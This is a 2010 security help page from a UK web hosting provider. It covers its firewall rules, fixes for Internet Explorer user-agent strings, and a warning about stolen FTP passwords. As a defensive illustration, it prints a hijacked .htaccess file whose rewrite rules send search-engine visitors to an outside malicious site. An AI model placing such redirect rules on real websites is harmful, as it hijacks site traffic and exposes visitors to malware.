Website Security Protection:

Web Application Firewall
How to Fix Your PC Internet Explorer IE User Agent String That Is Too Long Or Corrupt
Important Security Notices
Website FTP And HTTP Web Passwords Being Stolen By Viruses Used To Hijack Websites!
Mail Protection - Protect yourself from phishing, forged emails!
Banking Security Online!

 Web Application Firewall

To protect our customers from the ever growing malicious and criminal activity on the internet and escalating web attacks on our web servers from hackers, spammers, zombie bots, malware, etc, all our customer websites are now filtered and protected by a security web application firewall in addition to our standard perimeter hardware firewalls. The use of malware on websites to steal passwords and other sensitive information is one of the biggest Internet threats today! The firewall filter protects against SQL injection attacks, cross-site scripting (XSS) and checks for correct RFC compliant User Agents, URL RFC’s, RFC naming conventions, data being uploaded, threats, viruses, etc.

Correct Website RFC URL, Folder And File Naming Convention.
All published website named folders and files are restricted to a set of filename-legal characters only, any named folders or files containing illegal characters will be blocked due to security and RFC compliant policies.

Allowed typical folder and file name characters are:
You can use any combination of 26 letters in English alphabet, numbers from 0 to 9, "-" (hyphen), and "_" (Underscore).
 
Disallowed typical blocked folder and file name illegal characters are:
\:/*?"<>|$^#+=&

Other common security blocked URL sequences are:

/scripts/
/temp/
/bin/

To resolve please rename your conflicting web folders or files.

URL RFC Compliance.
All URLs will need to follow the proper RFC (RFC 1808 and RFC 1738). Encoded URLs are restricted to US-ASCII only. This probably means you don't use the required hex encoding (%xx) in your URLs for ASCII codes higher than 127 (or Unicode characters). To resolve this issue, you need to properly encode your URL!

Web Page Firewall Protection Window Warning Screen.
If you should encounter a web page firewall protection window warning screen and you feel that you received this page in error, first make sure your PC is not infected with a virus, as this can trigger our firewall protection! Next, try clearing your Internet Explorer temporary Internet files cache and deleting your cookies as these can become corrupt due to viruses and malicious malware from infected sites you may have visited. Next, check your PC registry Internet Explorer IE User Agent string is RFC compliant; it should not be too Long (over 128 characters) or corrupt!

If this still does not resolve your problem please email support (support@alpha1teclabs.com) and provide us with the following information with as much detail as possible:

The website URL you were visiting at the time?
Your Public IP address? To identify your PC Public IP address click link http://www.whatismyip.com/
Time?
Date?

Your PC Internet Explorer header IE user agent string can become corrupted by spyware malware, program updates or installs. This can cause websites not to function correctly and cause Internet Explorer to render incorrect HTML if the user-agent string is not RFC compliant, unusually long (for instance, over 128 characters). In order to correct this registry string you will need to edit your PC registry using a registry editor, for example you could use the command regedit. Warning! Incorrectly editing your registry may damage or render your computer unusable! If in doubt please contact our PC Remote Support Team at http://www.alpha1teclabs.com/PC_Remote_Support.htm for remote support assistance or email support (support@alpha1teclabs.com).

Here is an example of an IE user agent string that is too long and has been infected with adware spyware below:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; FunWebProducts; Foxy/1; B4F-4.7.0.0-; KKman3.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)

Correct IE User Agent PC Header Examples:
* On Windows XP SP2, IE7 will send the following User-Agent header: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
* On Windows 2003 Server, IE7 will send the following User-Agent header: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)
* On Windows Vista, IE7 will send the following User-Agent header: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)

In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform

remove the registry key if it exists as this can cause the string to truncate although the extended part may not be visible in the string and can be the cause of a very long string, example Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

delete the string, you may also need to check the string entry again after rebooting your PC.

and here, make sure your current string is correct for your PC and IE version:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent

Mozilla/4.0 (compatible; MSIE 7.0; Win32)

So now the registry key states 'IE 7.0 NT 5.1' which is now correct for Internet Explorer 7 Windows 32bit.

Example of a Correct Registry User Agent Key string for XP or Vista with IE8 installed:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\
"User Agent" key string "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"

 Important Security Notices:

Website FTP And HTTP Web Passwords Being Stolen By Viruses Used To Hijack Websites!
Please keep your website FTP and http web passwords safe, we recommend you do not save your FTP passwords in your favourite FTP web publishing packages or browsers and enter them manually when prompted each time. Further we recommend you ensure your PC is fully patched and you have a good up to date anti-virus firewall package that can detect the latest viruses, spyware malware, botnets, which can protect your computer and all your online activities. The Trojan viruses, malware are currently stealing any saved username and passwords from your PC computer. The virus malware then sends the usernames and passwords to a server controlled by “hackers” automatically. The hackers will then make automated FTP or HTTP connections to your website and download any HTML or PHP files they find. Hackers will then modify your HTML, PHP, by adding virus code (an “iframe” tag) or append other script code. Robots.txt may also be modified to deny search engines detecting the malacoius scripts and ".htaccess" files may also be modified to redirect search engines and visitors to hacked web servers, that would further spread viruses by uploading your changed files back. Your site would would then start spreading the virus to new victims. Within a few days, your site could be marked as “This site may harm your computer” on Google, causing the number of your visitors to drop dramatically.

Example below of the contents of a website attack that has had it's ".htaccess" file hijacked which used mod rewrite to check the referer and if it is from one of the major search engines, the visitors are redirected away to the hacker's web page:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://mayatek.info/0/go.php?sid=2 [R,L]

Mail Protection - Protect yourself from phishing, forged emails:
Protect yourself from phishing, forged emails, install Iconix Email Identification - http://iconix.com/  - Instantly see which email messages are legitimate with an icon in your inbox.

Banking Security Online:
Protect your PayPal account login access, enable PayPal Security Key in your PayPal account - Double-lock your account with the SMS-based PayPal Security Key.

If you still require further assistance or have more security concerns please email support (support@alpha1teclabs.com).

Home

Package prices
 

Portfolio

Domain name FAQ help
 

Mail FAQ help
 

Website FAQ help

Web Hosting - Domain Names - Email - Web Design - PC Remote Support
Auctions & Classifieds - Message Board Community Forums + Projects & Blogs - Personals
Awstats - Website Statistics - ISP network status

Alpha1TecLabs Bristol UK ISP - ATW ISP - Alan T Williams - ATW IP

Web Hosting Service
Domain Name Registration
Web Design Services
Email - Internet Solutions
PC - Server Remote Support Technical Assistance

For Telephone support please call +44 (0)117 971 2641
From GMT 18:00 to 23:00 on weekdays, and weekends from 09:00 to 23:00.
Fax: +44 (0)117 971 2641
Email: support@alpha1teclabs.com
http://www.Alpha1TecLabs.com

Legal statement - Privacy notice - Acceptable use policy
Climate policy statement
 
Established 2001 - Currently not registered for VAT
Copyright © Alpha1TecLabs Bristol UK ISP 2001-2010
All rights reserved
Last updated 10/03/2010

UK web site hosted by Alpha1TecLabs Bristol UK ISP